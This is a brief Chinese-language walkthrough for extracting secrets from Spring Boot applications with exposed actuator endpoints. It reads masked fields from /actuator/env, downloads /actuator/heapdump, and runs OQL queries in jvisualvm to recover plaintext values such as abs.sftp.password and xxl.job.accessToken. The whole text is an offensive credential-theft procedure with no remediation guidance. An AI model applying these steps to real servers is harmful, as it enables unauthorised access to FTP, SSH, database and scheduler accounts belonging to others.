一、檢視加密星號資訊(適用於資料庫密碼、ftp、ssh)
1.首先訪問地址:http://url/actuator/env
出現一些配置資訊,搜尋帶有******
可以看到ftp的ip,username,password
2.接著訪問http://url/actuator/heapdump
下載下來heapdump檔案
使用java自帶的工具進行分析
位置:C:\Program Files\Java\jdk1.8.0_91\bin\jvisualvm.exe
裝入,檔案型別選擇堆檔案
透過前面的/env知道存在abs.sftp.password和xxl.job.accessToken欄位
就可以構建OQL查詢語句
select s from java.lang.String s where /abs.sftp.password/.test(s.value.toString())
abs.sftp.password為欄位名
同理也可以寫成
select s from java.lang.String s where /xxl.job.accessToken/.test(s.value.toString())
進入例項裡面,即可找到帶星的明文資訊
